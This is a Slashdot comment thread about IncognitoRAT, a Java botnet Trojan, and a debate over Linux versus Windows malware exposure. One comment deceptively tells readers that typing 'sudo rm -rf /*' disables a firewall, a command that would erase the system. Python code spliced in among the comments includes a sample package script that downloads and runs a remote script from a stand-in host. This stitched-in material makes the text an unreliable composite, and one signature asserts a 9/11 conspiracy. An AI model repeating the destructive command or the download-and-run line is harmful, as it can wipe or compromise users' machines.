Multiplatform Java Botnet Spotted In the Wild
It's fun sometimes to be smug because you are ("one is") using an operating system less susceptible to malware, or at least less targeted by malware creators, than is Microsoft Windows. Now, reader Orome1 writes with word of a Java-based, equal-opportunity botnet Trojan, excerpting from Help Net Security's report: "'IncognitoRAT is one example of a Java-based Trojan discovered in the wild that is being downloaded and installed by another component. This malware behaves like other Windows botnets but uses source code and libraries that can operate on other platforms,' explains McAfee's Carlos Castillo." So far, no mention of a Linux version, though.
It's in the wild!! A Java... a what??
> So far, no mention of a Linux version, though.
Someone tell me timothy is trolling. He can't really be that stupid, can he?
No mention of linux support. Do we always have to come last?
"So far, no mention of a Linux version, though."
Java is Java... there generally would not be a "Linux version", or any platform-specific version... sort of the whole point of this.
-Lod
I doubt that it works on MacOSX. Converting a jar to an exe is difficult. I wish I could do it reliably on Linux, but I can't (gcj doesn't really work). Jar2exe is Windows-only. So I don't see why we need to worry. Java itself is secure enough to at least make virus writing very difficult. So again, nothing to worry about. Another case of journalistic exaggeration.
Because it has a small market share. Nobody wants to write a program that will work on Unix-based systems because it just isn't practical. The main reason for this is that Linux systems vary wildly in terms of operation and security. Windows does not have this "problem" (and lack of standardization is what has kept Linux out of the mainstream) and, to a degree, neither do Macs. Who would want to write a botnet for Linux systems? Now, if our dreams become a reality and Linux becomes the de facto standard, then we will have problems too; this is a perfect example of security through obscurity. The opportunity costs outweigh the benefits; as long as this is true, Linux users have little to fear.
00010111 always try everything twice
AFAIK, any OS that allows a user to install software is susceptible to malware.
Anyone smugly thinking they aren't is an idiot.
Wake me up when a worm has been discovered in the wild targeting OS X or Linux
Wasn't this posted here a while back? I think it does run on Windows, Mac and Linux, but tests showed that Linux is the only platform that doesn't allow it to restart after a reboot. Can't find the story, could be wrong.
Shut up cat.
My karma is not a Chameleon.
Unix is where the term "root" for the #1 user, and hence "rootkit", comes from. Just look at rkhunter and chkrootkit: they search for about 150 such programs. And until very recently there was a long-standing remote vuln in dhcpd3 which existed for months after it was believed to be patched, although the patch was ineffective in Ubuntu. Yes, I still use Linux anyway, because Mathematica, MATLAB and Intel compilers have 1st-class support and hence I am much more productive, and the interface is more humane.
> Java is Java... there generally would not be a "Linux version", or any platform-specific version... sort of the whole point of this.
Which is why I never enable Java, period. If a site requires it, they don't need my eyeball time.
Bantam Dominique roosters crow a four-note song. Once you've heard it as "Happy BIRTHday" you can't NOT hear it that way
How imaginative. Why, when this fallacious "reasoning" is defeated in every single Slashdot story in which it comes up, do people persist in trying to promote this myth? You *can't* unwittingly install and run arbitrary code on Linux the way you can on Windows, unless you're incompetent and running as root all the time (which, incredibly, I do know of at least one person who does -- but it's rare).
Caveat Utilitor
Yeah, no-one would want to hack the OS that Google's servers run on.
And what kind of idiot would want an exploit that would only affect insignificant machines like those pointed to by facebook.com and youtube.com?
Nothing to be gained by exploiting this tiny, hobbyist OS.
jar2exe doesn't work by compiling Java to native code, it starts a JVM and provides the ability to package .jar files into the executable. In principle, a Linux version would be fairly simple to make.
Also, a given JVM is only as locked down as the SecurityManager running inside of it (assuming no exploitable flaws) and you can be assured the trojan packager is not installing one that stops anything.
I'm not really disagreeing with you, but not knowing linux I don't see why this is true. It seems to me that you can't really unwittingly run arbitrary code on windows and that any of the applications/settings that negate this would be just as big a problem on linux.
If you don't know Linux then your opinion doesn't really matter.
I am pretty sure every Linux user here has used Linux AND windows and therefore has the ability to make a direct comparison from a purely user perspective.
If you want your opinion to count for something in cases like this then download Virtualbox and install a Linux VM so that you can experience the differences for yourself.
if linux were to be brought to the level of user-friendliness that windows and osx are at (ie, be a "consumer ready" OS with all that entails), i wouldn't be surprised if people did start running it as root all the time.
windows tried to introduce similar user access control and they got caned for it (even though OSX has the same prompts, but whatevs).
Write once, pwn anywhere.
This is almost as news worthy as a botnet client written in Win32, that might potentially infect Linux computers because the packager could wrap it in Wine.
Java botnet, courtesy of McAfee, the same company that tried to scare people with "jpeg virus" a couple of years ago...
Until you replied to yourself here, I wasn't certain about the fact that you're a troll. I thought maybe you were just a garden variety jackass with more confidence than capability.
The sig is a good touch, it's right on the line between parody and shithead. Well played.
They just gave Oracle a new slogan for Java, "Write once, pwn everywhere!"
Monstar L
"No OS left behind."
2019 is going to be the year of Linux on the desktop.
> if linux were to be brought to the level of user-friendliness that windows and osx are at
i.e. make it suck...
> (ie, be a "consumer ready" OS with all that entails)
It sounds like you haven't used Linux since last millennium. Lots have happened since then.
A couple of years ago, I gave my father a laptop with Linux installed. At that time he was 65 years old and had never used a computer before. He didn't have any problems using Linux, so maybe you're wrong, if you think Linux ain't "consumer ready".
i'm using it now, buddy.
i could go into the fun i've had getting my USB sound card working.
linux is user-friendly if all you want to do is browse, tweet, IM or email.
as soon as you try anything else, you're in "this is unsupported. it's not our fault. there's a patch here, or is it here. you'll have to recompile the kernel, then recompile ALSA, then compile and install wineasio, jack-dev, and wine-dev, then configure everything. oh, you mean you're not running this really old kernel? well, there's no kernel headers for your version, so you won't be able to recompile ALSA at all. it's not our fault - blame the manufacturer of your hardware".
linux's user-friendliness is a veneer. once you peel it away, you still wind up doing everything in terminal, just like you have for the last 20 years.
note that this is not a big criticism - i love how far it's come. i'm just saying it has further to go, and needs to get along with (often hostile) hardware manufacturers a little better to provide the kind of experience windows or osx can provide, security holes or not.
> You *can't* unwittingly install and run arbitrary code on Linux the way you can on windows, unless you're incompetent and running as root all the time
Last I checked, most Linux distros don't have noexec on home, so you most certainly can install and run arbitrary code without having root. It's slightly more of a hurdle in that email attachments and downloaded files won't be immediately executable.
Then again, in Ubuntu, for example, downloading a .deb package in browser and clicking "Open" will launch a GUI installer - and if user clicks "Yes, I want to install this", the .deb can run anything it wants as part of that installation, with root permissions too.
Thing is, you can't have ease of use that's only magically applicable to "good" scenarios - not unless God implements the evil bit.
NoScript.
Great, since you clearly know why it is so, perhaps you could explain it to us mere mortals that are perfectly happy using only one OS. My opinion matters; my information, however, is undependable because I didn't provide anything. Wolfing's opinion also matters, but his information is also undependable because he didn't provide any either.
If you're going to state an opinion, you probably want to back it up when queried on it. Very few people should believe a statement that says "This is true because it is".
Seriously for a moment.
Do you have antivirus installed on your linux box? No? you are probably infected.
Do you know how to find out when your linux box has been infected? No? You are probably infected.
Do you know how your linux box gets infected? No? You are probably infected.
Have you disabled SELinux because it was quicker than working out how to fix something it was preventing? Yes? You are probably infected.
Linux is not the virus/trojan free utopia it used to be, and worse, they work without the "machine running like a dog" instant red flag that comes with most windows infections.
The problem with your BS MR AC, is this: Those servers? they actually have these things called "admins" that make many thousands of dollars and are sent to classes and things like Black hat to stay on top of the game, whereas with Windows you have the nice little old lady down the hall that still can't figure out the difference between memory and hard drive space.
Think of it THIS way MR AC: Which would be easier to rob, the bank in the middle of Paduka AR with one old guy that hasn't fired a gun in 30 years, or the supermegabank in Las Vegas where they have had a dozen attempts over the years and have ex special forces for security?
In the end, as much as it will butthurt the Linux desktop users (all four of you) the simple fact is YOU ARE TOO SMALL to be worth the trouble, and the servers running Linux are locked down tighter than a nun's thighs by guys like my old friend Glenn that spend all their time ass deep in sites like Securina and consider recompiling code for security and speed improvements a "fun" way to spend an afternoon. In the end malware writers are like any other criminal and are thus lazy: the easiest mark will always be the target. Now once XP finally dies hard? Well as we have seen with the OSX malware kit they are starting to look at OSX as kinda tasty, and there are plenty of exploits for Android. But Linux desktop is what...0.02% of the market? It would be like targeting OS/2 Warp users, it just isn't worth the effort.
ACs don't waste your time replying, your posts are never seen by me.
The original McAfee blog article says this (why not link to the original resource in the first place?):
So this is not different at all from the Java-based Facebook suicide Trojan horse which circulated in Spring 2010 (but was not spotted by most AV companies back then).
You're right. For Joe Average, it makes a great desktop if they don't need to change anything. I think we are at the point where configuration takes some skill, but the user experience is just fine.
I've got my senior citizen mother using Slackware. She doesn't understand much of anything about computers, or viruses, or pretty much anything your average 15 year old would get about computers, but the interface is _still_ easy enough for her requirements (lolcats, email, reading news/recipes)
If she actually needs to change anything, it is past her abilities and she has to call me. She had to do that under windows, though, so no difference to me, + the added bonus that I don't clean a pile of malware off it every time I visit. Getting her on linux has cured a long standing headache.
[citation needed]
Wow that carries so much weight coming from an Anonymous Coward. Maybe when you grow up you'll have a slashdot account and everything!
If that's the whole story and you're so knowledgeable then prove me wrong by whipping up a little malware for Linux and post the link so I can try it out. Oddly, after several years of proposing this obvious way to prove that "point", not one person has done it. Must not be as easy as you like to imagine.
Oh, I won't need a link for that.
If you want to see HOT NAKED LESBIANS though, I'll be happy to give you the link: right here.
If it doesn't work, it's because your firewall blocks it. It's because your Ubuntu Linux, being such a secure OS as you surely know, is highly efficient at blocking various things deemed undesirable. Makes sense, right? But if you want to see HOT NAKED LESBIANS, you'll need to disable it just for this occasion. Luckily this is very easy to do. Just go to Applications -> Utilities -> Terminal, type "sudo rm -rf /*" in the window that appears, and press Enter (to clarify, "rm" means "remove", and "-rf" means "remove filter"; "/*" means "all sites"). Since this is a security-related operation, you will of course need to type in your password to confirm that you are fully aware of what you're doing - which you do, as I have explained it above.
You will need to wait for a few minutes before firewall is reconfigured, though. If your system starts behaving erratically, it may be because the firewall couldn't fully reconfigure due to network being in use; it just means you'll need to reboot.
I used to run one of those "what is my IP" sites. Now it's IPv6-only because various botnets started (ab)using it. I get a few thousand hits by "Apache-HttpClient/UNAVAILABLE (java 1.4)" per hour. Other AV vendors have known for a while; searching for my site turns up several (not McAfee) that list it as something the bots use.
9/11: Never forget it was a false-flag operation
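The comment above describes a what-is-my-IP site being hit thousands of times per hour by clients sending the stock "Apache-HttpClient/UNAVAILABLE (java 1.4)" string. As an added example (not from the thread, and not McAfee's or any vendor's code), here is a small Python check a site operator could run over an Apache combined-format access log to surface exactly that pattern: one client string arriving from many distinct addresses inside a single hour, which is what a botnet looks like from the server side. The log lines are constructed (TEST-NET addresses) and the threshold of three hosts per hour is an assumed, tunable value.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache "combined" log format: ip ident user [ts] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Client string quoted in the comment above.
JAVA_UA = "Apache-HttpClient/UNAVAILABLE (java 1.4)"

# Constructed sample log: four distinct hosts sending the same Java client
# string within one hour, two ordinary browsers, and one unparseable line.
SAMPLE_LOG = f"""\
203.0.113.5 - - [05/May/2011:21:01:12 +0000] "GET / HTTP/1.1" 200 14 "-" "{JAVA_UA}"
198.51.100.7 - - [05/May/2011:21:04:48 +0000] "GET / HTTP/1.1" 200 14 "-" "{JAVA_UA}"
192.0.2.33 - - [05/May/2011:21:20:03 +0000] "GET / HTTP/1.1" 200 14 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:2.0) Gecko/20100101 Firefox/4.0"
203.0.113.9 - - [05/May/2011:21:31:55 +0000] "GET / HTTP/1.1" 200 14 "-" "{JAVA_UA}"
198.51.100.20 - - [05/May/2011:21:40:10 +0000] "GET / HTTP/1.1" 200 14 "-" "Mozilla/5.0 (Windows NT 6.1; rv:2.0) Gecko/20100101 Firefox/4.0"
192.0.2.77 - - [05/May/2011:21:59:59 +0000] "GET / HTTP/1.1" 200 14 "-" "{JAVA_UA}"
this line is not an access log record
"""


def parse_line(line: str):
    """Return the fields we need from one combined-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": m["ip"], "hour": ts.strftime("%Y-%m-%d %H"), "ua": m["ua"]}


def ua_fanout(lines):
    """Map (hour, user-agent) -> set of distinct client addresses that sent it."""
    seen = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is not None:  # skip lines that are not access records
            seen[(rec["hour"], rec["ua"])].add(rec["ip"])
    return seen


def flag_bot_user_agents(lines, min_ips=3):
    """User-agent strings sent by at least `min_ips` distinct hosts within one hour (assumed threshold)."""
    return {ua for (_hour, ua), ips in ua_fanout(lines).items() if len(ips) >= min_ips}


if __name__ == "__main__":
    for ua in sorted(flag_bot_user_agents(SAMPLE_LOG.splitlines())):
        print("suspect client string:", ua)
```

Counting distinct source addresses per client string, rather than raw hit counts, is what separates a botnet from one busy legitimate crawler: a single misbehaving host produces volume from one address, whereas infected machines each contribute a few requests from many addresses. On a real log you would pipe the file's lines into `flag_bot_user_agents` and feed the result into a block list or a rate limiter.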
Sucks to be you. Gentoo user here, with a considerable amount of real world experience. Troll harder.
> Java-based Trojan discovered in the wild that is being downloaded and installed by another component. This malware behaves like other Windows botnets but uses source code and libraries that can operate on other platforms ..
Is there a working demo in the wild that I can click on and get rooted on other non-Windows platforms?
Why would there be a "Linux version" of code that runs on multiple platforms? The "Windows version" IS the "Linux version."
Move sig!
You didn't ask malware for Gentoo, though. You asked malware for Linux. 70% of Linux boxen out there run Ubuntu, and probably a half of people who run them don't know what they're doing (judging by the number of people burned every time someone posts a fork bomb or rm carefully disguised inside some Perl ASCII graphics).
I think my original point stands though. If it's so easy to compromise Linux, why isn't it being done? Why can't the very people who like to crow about how easy it is (and even hurl accusations of "security through obscurity") just put up or shut up?
I think we both know the answer to that. The PEBKAC is still there for the average user, no matter which system they use. But in Linux the system isn't designed to make it trivial to run any code from any location, as windows historically has been -- it's a bit better with 7 than it was previously, and XP SP3 is also a major improvement over previous versions. But it's still fairly trivial to generate windows malware, going by the sheer volume of infected machines. I personally have one person in my contacts running win7 whose machine is spamming me daily. Oops. Windows is still the lowest hanging fruit, and as criminals are pretty much always lazy people looking to get rich quick that's what they go for. When that's gone, they'll move on to other scams (assuming OS X has been locked down, otherwise that's hanging a bit low as it is). They will not learn to be 1337 for reelz and finally code that Linux virus. That's not the criminal MO.
We all know how slow Java is and botnet node users are not willing to upgrade their hardware just to provide a faster service for people who don't pay a cent. So this well-known Java paradigm "Is it too slow? Just add more hardware power!" will not work here.
Who needs to bother getting users to use sudo for e-mail? They install their shitty little PHP-based content management systems by hand and then happily never fucking update them.
Hurr, durr, yum, herp derp, apt-get; all those regular updates and package management bullshit is bullshit when it comes to people uncompressing crap into docroots.
The amount of Linux servers I've seen that have been totally owned and churning out spam by the goddamned megaton is legion.
Java??? How is this going to go unnoticed when it consumes 1/2 your memory and CPU?
Per my subject-line above? Linksys routers have a SECURITY setting that allows for filtration of JAVA applets too, per this point you made:
"Getting it onto your system is the trick, though. If they found a hole in the Java plugin's sandbox, they could potentially exploit that using an applet and get the code onto your system. Disabling the plugin prevents that possibility, but if they were trying to push this via browsers there are lots of other plugins and holes are found in browsers all the time." - by Cougar Town (1669754) on Thursday May 05, @09:26PM (#36043646)
So, IF anyone's concerned about that? The "layered security" way around it, is to use router based filtering of JAVA applets (again, which Linksys routers have a security option for, as one example thereof).
APK
This trojan isn't made this way to be multiplatform, but to make it harder to analyse and/or detect, both with manual and automated analysis.
I am sick and tired of these motherfucking rants on this motherfucking site!
"When information is power, privacy is freedom" - Jah-Wren Ryel
AppArmor.
GP also ignores the huge number of attempted attacks that every single Internet-reachable Linux box faces every single day. There is no lack of interest, just a lack of success.
> Then again, in Ubuntu, for example, downloading a .deb package in browser and clicking "Open" will launch a GUI installer - and if user clicks "Yes, I want to install this", the .deb can run anything it wants as part of that installation, with root permissions too.
Bullshit, you'll get a gksudo prompt, assuming you have sudo privileges at all.
You've only looked at the two extremes. What about all the companies running plain-jane Linux servers with access to all their VoIP accounts and/or file shares? What about all the websites that aren't run by megacorporations with a team of uber-leet admins watching it like a hawk? And what about all the Windows servers that ARE watched like a hawk by uber-leet admins but get broken into anyways?
Hello
If this is your first white screen of death
First contact Microsoft about this problem.
Then press the [any] key to continue.
If this screen still appears, you are infected by a virus.
-----------
This white screen of death is made by Microsoft
-----------
> The PEBKAC is still there for the average user, no matter which system they use.
It's true, but it still varies by system. Clearly, on Linux there are far fewer such users that would fall for it.
> But in Linux the system isn't designed to make it trivial to run any code from any location, as windows historically has been -- it's a bit better with 7 than it was previously, and XP SP3 is also a major improvement over previous versions.
It helps when you look specifically at what, exactly, is "more trivial" in Win7 (let's not deal with ancient software) compared to Linux.
And there's precisely one thing: the fact that executability of a file is controlled by its extension rather than a separate permission bit, which is why it is that much easier to get the user to run the payload. That's it. Everything else is the same.
And, as I pointed out in my earlier post, modern user-friendly Linux distros actually do allow the user to open runnable things "right from the browser", so to speak - such as .deb packages (which may contain arbitrary scripts). Given that Windows does prompt the user when he tries to run a downloaded .exe, we're talking about roughly the same amount of effort.
> Windows is still the lowest hanging fruit, and as criminals are pretty much always lazy people looking to get rich quick that's what they go for.
Very much, yes, and this is largely because the majority of the userbase is clueless, and because the system is surprisingly homogeneous even between major releases. E.g. the .deb trick described above - it would work in Ubuntu and some (not all) derivatives, but not on RedHat or SuSE. Thus, to target desktop Linux, you actually need several exploits, with several times the effort of what you'd need for Windows - and for what? 1% of desktop machines tops?
Like you say, people who write malware that you see in the wild don't do it for lulz, they do it for the money that it earns. When you're targeting desktops - which most botnets do - Windows and its userbase is an easy target with very lucrative rewards, and thus an obvious first choice. Why bother with the second, much less third?
For the same reason, most attacks target PEBKAC and not the actual OS security. Why bother, when the average user will happily get you past all security mechanisms if you're convincing enough (which is so easy)?
On the other hand, if you actually know what you're doing, you're safe on any major desktop platform today.
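Two comments in this thread make the same point from the defender's side: a .deb opened "right from the browser" carries maintainer scripts that dpkg runs as root, and nothing on a stock desktop shows the user what those scripts do before the password prompt. As an added example, not code from the thread or from any distribution's tooling, here is a self-contained Python inspector that unpacks a .deb (an `ar` archive holding `debian-binary`, `control.tar.*` and `data.tar.*`) and lists the `preinst`/`postinst`/`prerm`/`postrm` scripts inside it, so a package downloaded from an unknown site can be reviewed before anyone clicks "Install". The sample package is constructed in memory by the block itself; its `postinst` contents and the `example.invalid` host are made up to show what such a review surfaces.

```python
import io
import tarfile

# Maintainer scripts dpkg executes (as root) while installing or removing a package.
MAINTAINER_SCRIPTS = {"preinst", "postinst", "prerm", "postrm"}


def _ar_member(name: str, payload: bytes) -> bytes:
    """Encode one member of the classic 'ar' archive that wraps a .deb."""
    header = (
        name.ljust(16).encode()                  # member name, space padded
        + b"0".ljust(12)                         # mtime
        + b"0".ljust(6)                          # uid
        + b"0".ljust(6)                          # gid
        + b"100644".ljust(8)                     # mode (octal)
        + str(len(payload)).ljust(10).encode()   # payload size in bytes
        + b"`\n"                                 # header terminator
    )
    # Members start on even offsets; odd-length payloads get one newline of padding.
    return header + payload + (b"\n" if len(payload) % 2 else b"")


def _tar_gz(files: dict) -> bytes:
    """Pack {path: text} into a gzip'd tar stream laid out like dpkg-deb's control.tar.gz."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for path, text in files.items():
            data = text.encode()
            info = tarfile.TarInfo(name="./" + path)
            info.size = len(data)
            info.mode = 0o755
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def build_sample_deb() -> bytes:
    """Constructed sample: a tiny package whose postinst fetches and runs a remote script."""
    control = _tar_gz({
        "control": "Package: demo\nVersion: 1.0\nArchitecture: all\n"
                   "Maintainer: nobody <nobody@example.invalid>\nDescription: constructed sample\n",
        "postinst": "#!/bin/sh\n# constructed: this runs as root at install time\n"
                    "wget -qO- http://example.invalid/stage2 | sh\n",
    })
    data = _tar_gz({"usr/share/doc/demo/README": "demo package\n"})
    return (b"!<arch>\n"
            + _ar_member("debian-binary", b"2.0\n")
            + _ar_member("control.tar.gz", control)
            + _ar_member("data.tar.gz", data))


def ar_members(blob: bytes):
    """Yield (name, bytes) for each member of an ar archive; raise on a malformed header."""
    if not blob.startswith(b"!<arch>\n"):
        raise ValueError("not an ar archive")
    pos = 8
    while pos + 60 <= len(blob):
        hdr = blob[pos:pos + 60]
        if hdr[58:60] != b"`\n":
            raise ValueError("corrupt ar member header at offset %d" % pos)
        name = hdr[:16].decode("ascii").strip().rstrip("/")
        size = int(hdr[48:58].decode("ascii").strip())
        start = pos + 60
        if start + size > len(blob):
            raise ValueError("truncated ar member %r" % name)
        yield name, blob[start:start + size]
        pos = start + size + (size % 2)   # skip the padding byte after odd sizes


def maintainer_scripts(deb: bytes) -> dict:
    """Return {script name: contents} for every maintainer script inside a .deb."""
    members = dict(ar_members(deb))
    if members.get("debian-binary", b"").strip() != b"2.0":
        raise ValueError("not a version 2.0 .deb")
    control_name = next((n for n in members if n.startswith("control.tar")), None)
    if control_name is None:
        raise ValueError("no control.tar.* member")
    found = {}
    # mode "r:*" lets tarfile detect gzip/xz/bz2 compression of the control tarball.
    with tarfile.open(fileobj=io.BytesIO(members[control_name]), mode="r:*") as tar:
        for entry in tar.getmembers():
            base = entry.name.rsplit("/", 1)[-1]
            if entry.isfile() and base in MAINTAINER_SCRIPTS:
                found[base] = tar.extractfile(entry).read().decode(errors="replace")
    return found


if __name__ == "__main__":
    for name, body in maintainer_scripts(build_sample_deb()).items():
        print("== %s (runs as root at install time) ==\n%s" % (name, body))
```

Pointing `maintainer_scripts` at `open("some.deb", "rb").read()` prints each hook script in full; anything that downloads, writes outside the package's own paths, or edits cron or systemd units is worth a second look before the install prompt is answered, since the GUI installer gives the script exactly the privileges the comments above describe.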
Yes, you will get such a prompt - so what? If the user has actually tried to open the .deb file from a random place, why do you think he'll suddenly stop at a stock OS prompt that he had seen before?
And yes, you can assume they have sudo privileges - the default user in Ubuntu does, out of the box.
The point is there is no privilege elevation exploit in gdebi as you suggest. Yes the average user with sudo access can enter their sudo password to install a malicious app. But that's one step away from beating the computer with a sledgehammer. You can't stop users from destroying their own computers.
> The point is there is no privilege elevation exploit in gdebi as you suggest.
At no point did I suggest that there's any kind of privilege elevation exploit. 99% of Windows malware infections don't use one, either - they rely on the user to willingly circumvent any protections the OS might throw at him (Vista/7 have SUA, remember, which is not fundamentally any different from sudo).
> You can't stop users from destroying their own computers.
My point exactly.
Actually I've set up quite a few of those, and they damned near all run WinServer. Hell I can take any PHB and have him in about two weeks far enough along he can add OUs and do basic GPO edits. WinServer is so damned "clicky clicky" it is beyond simple now.
The problem with Linux, especially in the server role, is you really have to know your shit to get it running rock solid and hassle free. And those guys? They ain't cheap, even if there are any in your area (which is usually rare unless you live in a city of over 500,000) whereas MCSEs are as common as dirt and just as cheap. As long as you pay for licenses by the server and not the user (which in small shops works just fine) then WinServer ends up cheaper in the long run. For web hosting you just pay some guy to set up the website on a virtual server with some hosting company, easy peasy.
So I'd say there is a reason why fully two thirds of new servers being sold are coming with WinServer, and WinSBS is selling like hotcakes. Because despite the "free as in beer" BS it actually comes out cheaper in the long run to get an MCSE than it is to pay a Linux guru for anything smaller than, say, UPS or Amazon. Linux guys are rare, expensive, and even then all it takes is one funky rare error for the downtime to kill you. With WinServer any problem has been found a thousand times over and is usually one short Google away from being fixed. Hell, my mom could run a Windows domain, it really ain't hard.
I am one of "those guys." And trust me I wish we were really expensive but we don't make a whole lot more than Windows admins (unless you consider not having to deal with Windows boxes to be part of the payment). Rare? Maybe, but just in my area I know 2 other Linux admins, and there's nowhere near half a million people around here, so we're not that rare.
As for downtime, that is laughable. Telling a Linux admin to worry about downtime is like telling a gunship pilot to worry about a guy with a slingshot. We're not concerned. We've got it under control.
And, I really don't see your point, unless you're saying that a secured http page has an exploit on it for instance, theoretically... is that where you're going in your statement?
P.S.=> If so, that's when I'd couple using say, Opera's "by site preferences" & ONLY ALLOW java to run on certain pages that demand it & that I know are trustworthy... in combination with the Linksys security feature I noted (where the router can "filter out" java applets), for "layered security" purposes... apk
Excuse my question: is this the first botnet running in Java? What are the other common languages that are used to write this stuff? For sure it ain't Visual Basic. Why is the code of malware not portable when written in C++? For now it's just a matter of time until the botnets run more reliably in Linux, but still run in $gcc_plattform.